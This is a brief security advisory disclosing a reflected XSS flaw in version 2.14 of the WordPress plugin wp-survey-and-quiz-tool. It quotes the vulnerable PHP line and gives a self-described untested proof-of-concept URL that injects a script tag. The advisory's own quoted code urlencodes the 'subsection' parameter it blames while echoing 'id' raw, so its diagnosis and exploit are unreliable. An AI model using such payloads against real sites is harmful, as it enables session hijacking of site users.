Larry Cashdollar Vulnerability

Advisory #: 366

Title: Reflected XSS in wordpress plugin wp-survey-and-quiz-tool v2.14

Author: Larry W. Cashdollar, @_larry0

Date: 2016-02-09

Download Site: https://wordpress.org/plugins/wp-survey-and-quiz-tool

Downloads: 152221

Vendor Notified: 2016-02-09

Export: Json

Vendor Contact: plugins@wordpress.org

Plugin Name: wp-survey-and-quiz-tool

Vulnerability:

There is a reflected XSS vulnerability in the following php code ./wp-survey-and-quiz-tool/pages/admin/misc/navbar.php: 62: <form action="<?php echo WPSQT_URL_MAIN; ?>&section=edit&subsection=<?php echo urlencode($_GET["subsection"]); ?>&id=<?php echo $_GET['id']; ?>" method="post"> The variable subsection appears to send unsanitized data back to the users browser.

CVE-ID: Not Released

File:./wp-survey-and-quiz-tool/pages/admin/misc/navbar.php

Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.

This is an untested autogenerated exploit:
http://[target]/wp-content/plugins/wp-survey-and-quiz-tool/pages/admin/misc/navbar.php?subsection="><script>alert(1);</script><"